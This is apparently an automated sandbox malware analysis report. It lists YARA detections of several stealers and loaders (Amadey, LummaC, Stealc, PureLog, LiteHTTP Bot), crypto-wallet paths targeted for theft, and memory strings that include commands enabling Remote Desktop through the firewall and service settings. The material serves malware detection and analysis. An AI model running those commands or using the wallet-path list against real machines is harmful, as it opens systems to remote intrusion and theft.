Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10106720101\df7baf8347.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10106720101\df7baf8347.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation

Source: C:\Users\user\Desktop\5c9465cda4.exe

Code function: 0_2_00ACD21C GetLocalTime,

0_2_00ACD21C

Source: C:\Users\user\Desktop\5c9465cda4.exe

Code function: 0_2_00ACD27A GetUserNameW,

0_2_00ACD27A

Source: C:\Users\user\Desktop\5c9465cda4.exe

Code function: 0_2_00AABB6F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_00AABB6F

Source: C:\Users\user\Desktop\5c9465cda4.exe

Code function: 0_2_00A742DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00A742DE

Source: C:\Users\user\AppData\Local\Temp\10104900101\ce4pMzk.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Yara detected Amadey

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Yara detected Amadeys Clipper DLL

Source: Yara match	File source: 0000000C.00000003.1767560692.0000000004E60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.2240830062.0000000004D40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1767399937.0000000000901000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 00000030.00000002.2780738484.0000000000501000.00000040.00000001.01000000.00000043.sdmp, type: MEMORY
Source: Yara match	File source: 0000002E.00000002.2723583767.0000000000501000.00000040.00000001.01000000.00000043.sdmp, type: MEMORY
Source: Yara match	File source: 0000002E.00000003.2682259551.0000000004BA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000003.1788630299.0000000004AC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000041.00000003.2780159007.0000000004970000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000030.00000003.2738904181.0000000004C80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1802597444.0000000000681000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.1727074153.0000000005100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.1807784692.0000000000681000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.1829256764.0000000000901000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1762219821.0000000004E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000041.00000002.2821715122.0000000000231000.00000040.00000001.01000000.00000045.sdmp, type: MEMORY

Yara detected GCleaner

Source: Yara match	File source: 64.2.df7baf8347.exe.de44000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 64.2.df7baf8347.exe.de9c000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 64.3.df7baf8347.exe.e092000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 64.2.df7baf8347.exe.de18000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 64.2.df7baf8347.exe.e092000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 64.2.df7baf8347.exe.de70000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000040.00000002.2948533861.000000000DE18000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000040.00000002.2948533861.000000000DE70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000040.00000002.2948533861.000000000DE44000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000040.00000002.2950683362.000000000E0DC000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000040.00000002.2948533861.000000000DE9C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000040.00000003.2872264238.000000000E08A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000040.00000002.2950203188.000000000E092000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected LiteHTTP Bot

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 28.0.ce4pMzk.exe.21039bd3fe8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.ce4pMzk.exe.21039bd3fe8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.ce4pMzk.exe.21039bd0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001C.00000000.2468317844.0000021039BD2000.00000002.00000001.01000000.00000024.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ce4pMzk.exe PID: 1700, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\ce4pMzk[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\10104900101\ce4pMzk.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Local\Caches\08oGp67f\Anubis.exe, type: DROPPED

Yara detected LummaC Stealer

Source: Yara match	File source: 33.2.zY9sqWs.exe.f50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.0.zY9sqWs.exe.f50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000021.00000003.2746445267.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\zY9sqWs[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\10106470101\zY9sqWs.exe, type: DROPPED
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected Mint Stealer

Source: Yara match	File source: 0000001B.00000002.2545323720.000001D127CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: chromium.exe PID: 7872, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\10106730101\a0b9927072.exe, type: DROPPED

Yara detected Stealc

Source: Yara match

File source: dump.pcap, type: PCAP

Found many strings related to Crypto-Wallets (likely being stolen)

Source: chromium.exe, 0000001B.00000002.2545323720.000001D127CF0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: \Electrum-LTC\wallets\
Source: chromium.exe, 0000001B.00000002.2545323720.000001D127CF0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: \ElectronCash\wallets\default_wallet
Source: chromium.exe, 0000001B.00000002.2545323720.000001D127CF0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: \Electrum\wallets\
Source: chromium.exe, 0000001B.00000002.2545323720.000001D127CF0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: d\Coinom\jaxx\LocalStorage\file_0.localstorage
Source: chromium.exe, 0000001B.00000002.2545323720.000001D127CF0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: \Exodus\window-state.json
Source: chromium.exe, 0000001B.00000002.2545323720.000001D127CF0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: \Exodus\exodus.conf.json
Source: chromium.exe, 0000001B.00000002.2545323720.000001D127CF0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: \Exodus\exodus.wallet\
Source: chromium.exe, 0000001B.00000002.2545323720.000001D127CF0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: \Ethereum\keystore\
Source: chromium.exe, 0000001B.00000002.2545323720.000001D127CF0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: Exodus
Source: chromium.exe, 0000001B.00000002.2545323720.000001D127CF0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: \ElectronCash\wallets\default_wallet
Source: chromium.exe, 0000001B.00000002.2545323720.000001D127CF0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: \Ethereum
Source: chromium.exe, 0000001B.00000002.2545323720.000001D127CF0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: \Exodus\exodus.wallet\
Source: chromium.exe, 0000001B.00000002.2545323720.000001D127CF0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: \MultiDog\multidoge.wallet\
Source: powershell.exe, 00000005.00000002.1718765395.0000000006FE0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: sqlcolumnencryptionkeystoreprovider
Source: chromium.exe, 0000001B.00000002.2545323720.000001D127CF0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: \Electrum-LTC\wallets\

Source: 5c9465cda4.exe	Binary or memory string: WIN_81
Source: 5c9465cda4.exe	Binary or memory string: WIN_XP
Source: 5c9465cda4.exe, 00000000.00000000.1664651285.0000000000B32000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: 5c9465cda4.exe	Binary or memory string: WIN_XPe
Source: 5c9465cda4.exe	Binary or memory string: WIN_VISTA
Source: 5c9465cda4.exe	Binary or memory string: WIN_7
Source: 5c9465cda4.exe	Binary or memory string: WIN_8

Source: Yara match	File source: 0000001B.00000002.2545323720.000001D127CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: chromium.exe PID: 7872, type: MEMORYSTR

Remote Access Functionality

Yara detected GCleaner

Source: Yara match	File source: 64.2.df7baf8347.exe.de44000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 64.2.df7baf8347.exe.de9c000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 64.3.df7baf8347.exe.e092000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 64.2.df7baf8347.exe.de18000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 64.2.df7baf8347.exe.e092000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 64.2.df7baf8347.exe.de70000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000040.00000002.2948533861.000000000DE18000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000040.00000002.2948533861.000000000DE70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000040.00000002.2948533861.000000000DE44000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000040.00000002.2950683362.000000000E0DC000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000040.00000002.2948533861.000000000DE9C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000040.00000003.2872264238.000000000E08A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000040.00000002.2950203188.000000000E092000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected LiteHTTP Bot

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 28.0.ce4pMzk.exe.21039bd3fe8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.ce4pMzk.exe.21039bd3fe8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.ce4pMzk.exe.21039bd0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001C.00000000.2468317844.0000021039BD2000.00000002.00000001.01000000.00000024.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ce4pMzk.exe PID: 1700, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\ce4pMzk[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\10104900101\ce4pMzk.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Local\Caches\08oGp67f\Anubis.exe, type: DROPPED

Yara detected LummaC Stealer

Source: Yara match	File source: 33.2.zY9sqWs.exe.f50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.0.zY9sqWs.exe.f50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000021.00000003.2746445267.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\zY9sqWs[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\10106470101\zY9sqWs.exe, type: DROPPED
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected Mint Stealer

Source: Yara match	File source: 0000001B.00000002.2545323720.000001D127CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: chromium.exe PID: 7872, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\10106730101\a0b9927072.exe, type: DROPPED

Yara detected Stealc

Source: Yara match

File source: dump.pcap, type: PCAP

Contains functionality to start a terminal service

Source: TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	String found in binary or memory: net start termservice
Source: TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE, 0000000A.00000002.1767399937.0000000000901000.00000040.00000001.01000000.0000000B.sdmp	String found in binary or memory: net start termservice
Source: TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE, 0000000A.00000002.1767399937.0000000000901000.00000040.00000001.01000000.0000000B.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE, 0000000A.00000003.1727074153.0000000005100000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: net start termservice
Source: TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE, 0000000A.00000003.1727074153.0000000005100000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 